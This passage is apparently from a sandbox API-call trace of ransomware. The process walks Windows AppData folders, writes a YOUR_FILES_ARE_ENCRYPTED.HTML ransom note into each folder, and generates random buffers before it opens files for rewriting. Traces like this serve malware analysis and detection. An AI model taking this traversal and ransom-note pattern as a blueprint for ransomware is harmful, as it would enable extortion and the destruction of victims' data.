cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0111.022] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5249ca3f, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5249ca3f, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249ca3f, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d4cc, dwReserved1=0x63d450, cFileName="..", cAlternateFileName="")) returned 1 [0111.022] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5249ca3f, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5249ca3f, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249ca3f, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d4cc, dwReserved1=0x63d450, cFileName="..", cAlternateFileName="")) returned 0 [0111.022] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0111.022] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\1K9321PQ\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 100 [0111.022] GetProcessHeap () returned 0x600000 [0111.022] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\1K9321PQ\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\feeds cache\\1k9321pq\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0111.023] WriteFile (in: hFile=0x310, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.024] CloseHandle (hObject=0x310) returned 1 [0111.024] GetProcessHeap () returned 0x600000 [0111.024] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.024] GetProcessHeap () returned 0x600000 [0111.024] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30d81a8 | out: hHeap=0x600000) returned 1 [0111.024] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5249a343, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5249a343, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249a343, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="984JQQMD", cAlternateFileName="")) returned 1 [0111.024] StrStrIW (lpFirst="984JQQMD", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.024] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\984JQQMD") returned 70 [0111.024] GetProcessHeap () returned 0x600000 [0111.024] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30d81a8 [0111.024] lstrcpyW (in: lpString1=0x30d81a8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\984JQQMD" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\984JQQMD") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\984JQQMD" [0111.024] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\984JQQMD", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\984JQQMD\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\984JQQMD\\*" [0111.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\984JQQMD\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5249a343, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5249a343, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249a343, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d4cc, dwReserved1=0x63d450, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0111.025] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5249a343, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5249a343, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249a343, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d4cc, dwReserved1=0x63d450, cFileName="..", cAlternateFileName="")) returned 1 [0111.025] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5249a343, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5249a343, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249a343, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d4cc, dwReserved1=0x63d450, cFileName="..", cAlternateFileName="")) returned 0 [0111.025] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0111.025] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\984JQQMD\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 100 [0111.025] GetProcessHeap () returned 0x600000 [0111.025] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\984JQQMD\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\feeds cache\\984jqqmd\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0111.025] WriteFile (in: hFile=0x310, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.026] CloseHandle (hObject=0x310) returned 1 [0111.027] GetProcessHeap () returned 0x600000 [0111.027] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.027] GetProcessHeap () returned 0x600000 [0111.027] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30d81a8 | out: hHeap=0x600000) returned 1 [0111.027] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x524634d7, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x524634d7, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x524634d7, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0111.027] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.027] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\container.dat") returned 75 [0111.027] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0111.027] lstrlenW (lpString=".dat") returned 4 [0111.027] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0111.027] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0111.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\feeds cache\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0111.027] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=0) returned 1 [0111.027] CloseHandle (hObject=0x310) returned 1 [0111.027] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5249b6da, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5249b6da, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249b6da, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="G3PH2L8X", cAlternateFileName="")) returned 1 [0111.027] StrStrIW (lpFirst="G3PH2L8X", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.027] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\G3PH2L8X") returned 70 [0111.027] GetProcessHeap () returned 0x600000 [0111.027] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30d81a8 [0111.027] lstrcpyW (in: lpString1=0x30d81a8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\G3PH2L8X" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\G3PH2L8X") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\G3PH2L8X" [0111.027] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\G3PH2L8X", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\G3PH2L8X\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\G3PH2L8X\\*" [0111.028] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\G3PH2L8X\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5249b6da, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5249b6da, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249b6da, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e298, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0111.028] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5249b6da, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5249b6da, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249b6da, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e298, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0111.028] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5249b6da, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5249b6da, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249b6da, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e298, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 0 [0111.028] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0111.028] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\G3PH2L8X\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 100 [0111.028] GetProcessHeap () returned 0x600000 [0111.028] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\G3PH2L8X\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\feeds cache\\g3ph2l8x\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0111.034] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.039] CloseHandle (hObject=0x32c) returned 1 [0111.040] GetProcessHeap () returned 0x600000 [0111.040] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.040] GetProcessHeap () returned 0x600000 [0111.040] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30d81a8 | out: hHeap=0x600000) returned 1 [0111.041] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5249ca3f, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5249ca3f, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249ca3f, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="VNSCKPOZ", cAlternateFileName="")) returned 1 [0111.041] StrStrIW (lpFirst="VNSCKPOZ", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.041] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\VNSCKPOZ") returned 70 [0111.041] GetProcessHeap () returned 0x600000 [0111.041] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30d81a8 [0111.042] lstrcpyW (in: lpString1=0x30d81a8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\VNSCKPOZ" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\VNSCKPOZ") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\VNSCKPOZ" [0111.042] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\VNSCKPOZ", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\VNSCKPOZ\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\VNSCKPOZ\\*" [0111.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\VNSCKPOZ\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5249ca3f, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5249ca3f, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249f1fc, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e298, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0111.042] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5249ca3f, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5249ca3f, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249f1fc, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e298, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0111.042] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5249ddea, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5249ddea, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249ddea, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e298, dwReserved1=0x7784abfa, cFileName="ieonlinews.microsoft[1]", cAlternateFileName="IEONLI~1.MIC")) returned 1 [0111.042] StrStrIW (lpFirst="ieonlinews.microsoft[1]", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.042] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\VNSCKPOZ\\ieonlinews.microsoft[1]") returned 94 [0111.042] PathFindExtensionW (pszPath="ieonlinews.microsoft[1]") returned=".microsoft[1]" [0111.042] lstrlenW (lpString=".microsoft[1]") returned 13 [0111.042] PathFindExtensionW (pszPath="ieonlinews.microsoft[1]") returned=".microsoft[1]" [0111.042] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5249ddea, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5249ddea, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249ddea, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e298, dwReserved1=0x7784abfa, cFileName="ieonlinews.microsoft[1]", cAlternateFileName="IEONLI~1.MIC")) returned 0 [0111.042] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0111.042] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\VNSCKPOZ\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 100 [0111.042] GetProcessHeap () returned 0x600000 [0111.042] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\VNSCKPOZ\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\feeds cache\\vnsckpoz\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0111.043] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.044] CloseHandle (hObject=0x32c) returned 1 [0111.045] GetProcessHeap () returned 0x600000 [0111.045] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.045] GetProcessHeap () returned 0x600000 [0111.045] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30d81a8 | out: hHeap=0x600000) returned 1 [0111.045] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5249ca3f, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5249ca3f, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249ca3f, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="VNSCKPOZ", cAlternateFileName="")) returned 0 [0111.045] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0111.045] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0111.045] GetProcessHeap () returned 0x600000 [0111.046] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\feeds cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0111.046] WriteFile (in: hFile=0x320, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0111.047] CloseHandle (hObject=0x320) returned 1 [0111.048] GetProcessHeap () returned 0x600000 [0111.048] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.048] GetProcessHeap () returned 0x600000 [0111.048] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0111.049] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a17d745, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a184b86, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a184b86, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="FORMS", cAlternateFileName="")) returned 1 [0111.049] StrStrIW (lpFirst="FORMS", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.049] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\FORMS") returned 55 [0111.049] GetProcessHeap () returned 0x600000 [0111.049] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0111.050] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\FORMS" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\FORMS") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\FORMS" [0111.050] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\FORMS", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\FORMS\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\FORMS\\*" [0111.050] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\FORMS\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a17d745, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a184b86, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a184b86, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626878 [0111.051] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a17d745, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a184b86, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a184b86, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 